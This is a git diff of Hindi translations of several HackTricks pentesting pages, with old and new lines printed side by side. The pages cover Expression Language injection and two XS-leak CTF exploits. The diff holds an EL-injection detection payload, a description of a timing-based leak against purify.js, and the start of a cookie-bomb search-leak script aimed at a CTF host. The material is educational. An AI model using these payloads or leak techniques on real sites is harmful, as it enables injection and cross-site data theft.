<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को हैकट्रिक्स में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करने का एक्सेस** चाहिए? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **नवीनतम संस्करण का पीईएएस देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह। * [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**।**
* **हैकिंग ट्रिक्स साझा करें** द्वारा **पीआर जमा करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)। * **अपने हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details> </details>
## मूल जानकारी ## मूल जानकारी
एक्सप्रेशन भाषा (EL) जावा ईई में प्रमुख है जो प्रस्तुति परत (जैसे, वेब पेज) और एप्लिकेशन तर्क (जैसे, प्रबंधित बीन्स) को जोड़ने के लिए है, उनके बीच इंटरैक्शन संभावित करता है। यह प्रमुखतः इस्तेमाल होता है: एक्सप्रेशन भाषा (EL) जावा ईई में प्रमुख है जो प्रस्तुति स्तर (जैसे, वेब पेज) और एप्लिकेशन लॉजिक (जैसे, प्रबंधित बीन्स) को जोड़ने के लिए है, उनके बीच इंटरैक्शन संभावित करता है। यह प्रमुखतः इस्तेमाल होता है:
- **जावासर्वर फेसेस (जेएसएफ)**: यूआई कंपोनेंट्स को बैकएंड डेटा/क्रियाओं से जोड़ने के लिए। - **जावासर्वर फेसेस (जेएसएफ)**: यूआई कंपोनेंट्स को बैकएंड डेटा/क्रियाओं से जोड़ने के लिए।
- **जावासर्वर पेज्स (जेएसपी)**: जेएसपी पेज्स में डेटा एक्सेस और परिवर्तन के लिए। - **जावासर्वर पेज्स (जेएसपी)**: जेएसपी पेज्स में डेटा एक्सेस और परिवर्तन के लिए।
@ -23,9 +23,9 @@
**उपयोग संदर्भ**: **उपयोग संदर्भ**:
- **स्प्रिंग फ्रेमवर्क**: सुरक्षा और डेटा जैसे विभिन्न मॉड्यूलों में लागू। - **स्प्रिंग फ्रेमवर्क**: सुरक्षा और डेटा जैसे विभिन्न मॉड्यूलों में लागू।
- **सामान्य उपयोग**: जावा, कोटलिन, और स्काला जैसी जेवीएम आधारित भाषाओं में डेवलपर्स द्वारा SpEL एपीआई के माध्यम से। - **सामान्य उपयोग**: जेवीएम आधारित भाषाओं जैसे जावा, कोटलिन, और स्काला में डेवलपर्स द्वारा SpEL एपीआई के माध्यम से।
ईएल जावा ईई प्रौद्योगिकियों, स्थानिक परिवेशों में मौजूद है, और `.jsp` या `.jsf` फ़ाइल एक्सटेंशन, स्टैक त्रुटियाँ, और हेडर्स में "सर्वलेट" जैसे शब्दों के माध्यम से पहचानी जा सकती है। हालांकि, इसकी विशेषताएँ और कुछ विशेष वर्णों का उपयोग संस्करण-विशेष हो सकता है। ईएल जावा ईई प्रौद्योगिकियों, स्थानीय परिवेशों में मौजूद है, और `.jsp` या `.jsf` फ़ाइल एक्सटेंशन, स्टैक त्रुटियाँ, और "सर्वलेट" जैसे हेडर्स में शामिल हैं। हालांकि, इसकी विशेषताएँ और कुछ विशेष वर्णों का उपयोग संस्करण-विशेष हो सकता है।
{% hint style="info" %} {% hint style="info" %}
**ईएल संस्करण** के आधार पर कुछ **विशेषताएँ** **ऑन** या **ऑफ** हो सकती हैं और सामान्यत: कुछ **वर्ण** **अनुमति नहीं** हो सकते हैं। **ईएल संस्करण** के आधार पर कुछ **विशेषताएँ** **ऑन** या **ऑफ** हो सकती हैं और सामान्यत: कुछ **वर्ण** **अनुमति नहीं** हो सकते हैं।
@ -33,7 +33,7 @@
## मूल उदाहरण ## मूल उदाहरण
(आप एक और दिलचस्प ट्यूटोरियल एल में पा सकते हैं [https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/)) (आप एक और दिलचस्प ट्यूटोरियल एल के बारे में पा सकते हैं [https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/](https://pentest-tools.com/blog/exploiting-ognl-injection-in-apache-struts/))
[**Maven**](https://mvnrepository.com) रिपॉजिटरी से जार फ़ाइलें डाउनलोड करें: [**Maven**](https://mvnrepository.com) रिपॉजिटरी से जार फ़ाइलें डाउनलोड करें:
@ -108,7 +108,7 @@ Enter a String to evaluate:
``` ```
### पता लगाना ### पता लगाना
* Burp पता लगाना * बर्प पता लगाना
```bash ```bash
gk6q${"zkz".toString().replace("k", "x")}doap2 gk6q${"zkz".toString().replace("k", "x")}doap2
#The value returned was "igk6qzxzdoap2", indicating of the execution of the expression. #The value returned was "igk6qzxzdoap2", indicating of the execution of the expression.
@ -228,12 +228,12 @@ ${employee.FirstName}
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में** देखना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड** करना चाहते हैं? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **नवीनतम संस्करण का पीईएएस या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * खोजें [**द पीईएएस फैमिली**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**एनएफटीएस**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें। * पाएं [**आधिकारिक पीईएएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें।
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को फॉलो** करें। * **हैकिंग ट्रिक्स साझा करें एक** [**हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को पीआर जमा करके।**
</details> </details>

View file

@ -1,32 +1,32 @@
# Connection Pool by Destination उदाहरण # Connection Pool by Destination Example
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी को हैकट्रिक्स में विज्ञापित** किया जाए? या क्या आप **PEASS के नवीनतम संस्करण को डाउनलोड करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल** हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें**. * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके अपना योगदान दें**. * **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details> </details>
[**इस एक्सप्लॉइट**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-safelist-html) में, [**@terjanq**](https://twitter.com/terjanq) ने निम्नलिखित पृष्ठ में उल्लेखित चुनौती के लिए एक और समाधान प्रस्तावित किया है: [**इस एक्सप्लॉइट**](https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e#file-safelist-html) में, [**@terjanq**](https://twitter.com/terjanq) ने निम्नलिखित पृष्ठ में उल्लिखित चुनौती के लिए एक और समाधान प्रस्तुत किया है:
{% content-ref url="connection-pool-by-destination-example.md" %} {% content-ref url="connection-pool-by-destination-example.md" %}
[connection-pool-by-destination-example.md](connection-pool-by-destination-example.md) [connection-pool-by-destination-example.md](connection-pool-by-destination-example.md)
{% endcontent-ref %} {% endcontent-ref %}
चलिए देखें कि यह एक्सप्लॉइट कैसे काम करता है: चलिए देख हैं कि यह एक्सप्लॉइट कैसे काम करता है:
* हमलावर एक नोट में एक से अधिक **`<img`** टैग डालेगा जो **`/js/purify.js`** लोड करेगा (अधिकांशतः 6 से अधिक ताकि मूल्यांकन को ब्लॉक किया जा सके)। * हमलावर एक नोट डालेगा जिसमें जितने भी **`<img`** टैग होंगे जो **`/js/purify.js`** को **लोड** करेंगे (6 से अधिक ताकि मूल को ब्लॉक किया जा सके)।
* फिर, हमलावर नोट को **निकालेगा** जिसका सूचकांक 1 होगा * फिर, हमलावर नोट को इंडेक्स 1 से **हटा देगा**
* फिर, हमलावर \[बॉट को पृष्ठ लोड करने के लिए] **बनाएंगे** और एक **अनुरोध** भेजेंगे **`victim.com/js/purify.js`** को जिसे वह **समय** करेगा। * फिर, हमलावर \[शेष नोट के साथ पृष्ठ तक पहुंचने के लिए बॉट को एक्सेस कराएगा] और **`victim.com/js/purify.js`** पर एक **अनुरोध** भेजेगा जिसे वह **समय** करेगा।
* यदि समय **अधिक** है, तो **नोट** में हमला था, यदि समय **कम** है, तो उसमें **फ्लैग** था। * यदि समय **अधिक** है, तो **हमलावा** नोट में था, अगर समय **कम** है, तो **झंडा** वहां था।
{% hint style="info" %} {% hint style="info" %}
सच कहूं तो, स्क्रिप्ट पढ़ते समय मुझे वहां कुछ ऐसा हिस्सा दिखाई नहीं दिया जहां **हमलावर बॉट को पृष्ठ लोड करने के लिए ट्रिगर करता है**, मैं कोड में ऐसा कुछ नहीं देख रहा हूँ। सच कहूं, स्क्रिप्ट पढ़ते समय मुझे कुछ भाग छूट गया जहां **हमलावर बॉट को पृष्ठ लोड करने के लिए ट्रिगर करता है ताकि छवि टैग्स लोड हों**, मुझे कोड में ऐसा कुछ नहीं दिखाई देता
{% endhint %} {% endhint %}
```html ```html
<html> <html>
@ -124,10 +124,10 @@ break;
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके साझा करें**. * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)** को PRs सबमिट करके।
</details> </details>

View file

@ -1,18 +1,18 @@
# कुकी बम्ब + ऑनएरर XS लीक # कुकी बम्ब + ऑनएरर XS लीक
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **हैकट्रिक्स में विज्ञापित करना** चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की इच्छा है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण को देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा संग्रह अनन्य [**NFTs**](https://opensea.io/collection/the-peass-family) का * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीज**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या मुझे **ट्विटर** पर **फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को** * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** में PR जमा करके **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **को**.
</details> </details>
निम्नलिखित **स्क्रिप्ट** [**यहां से**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) लिया गया है जो उपयोगकर्ता को **किसी भी मात्रा की कुकी** डालने की सुविधा का उपयोग कर रहा है, और फिर एक फ़ाइल को स्क्रिप्ट के रूप में लोड कर रहा है जानते हुए कि सच्चा प्रतिक्रिया झूलती होगी और फिर। सफलतापूर्वक, प्रतिक्रिया एक पुनर्निर्देशन होगी जिसमें एक परिणामस्वरूप URL लंबा होगा, **सर्वर द्वारा संभालने के लिए बहुत बड़ा होगा इसलिए एक त्रुटि HTTP स्थिति कोड लौटाएगा**। यदि खोज विफल होती है, तो कुछ नहीं होगा क्योंकि URL छोटा होगा यहाँ से लिया गया **स्क्रिप्ट** [**यहाँ**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) एक फ़ंक्शनलिटी का शोषण कर रहा है जो उपयोगकर्ता को **किसी भी मात्रा की कुकी** डालने की अनुमति देती है, और फिर एक फ़ाइल को एक स्क्रिप्ट के रूप में लोड करने के बाद, जानते हुए कि सच्ची प्रतिक्रिया झूठी प्रतिक्रिया से अधिक होगी और फिर। यदि सफल होता है, तो प्रतिक्रिया एक रीडायरेक्ट है जिसमें एक परिणामी URL होता है जो **सर्वर द्वारा संभालने के लिए बहुत बड़ा है ताकि एक त्रुटि HTTP स्थिति कोड वापस दे**। यदि खोज विफल होती है, तो कुछ नहीं होगा क्योंकि URL छोटा ह
```html ```html
<>'";<form action='https://sustenance.web.actf.co/s' method=POST><input id=f /><input name=search value=a /></form> <>'";<form action='https://sustenance.web.actf.co/s' method=POST><input id=f /><input name=search value=a /></form>
<script> <script>
@ -65,10 +65,10 @@ break;
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करना चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT संग्रह**](https://opensea.io/collection/the-peass-family) * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में या **मुझे** **Twitter** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को** * **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks रेपो**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud)।
</details> </details>

View file

@ -1,20 +1,20 @@
# इवेंट लूप ब्लॉकिंग + लेजी इमेजेस # घटना लूप अवरोधन + आलसी छवियाँ
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
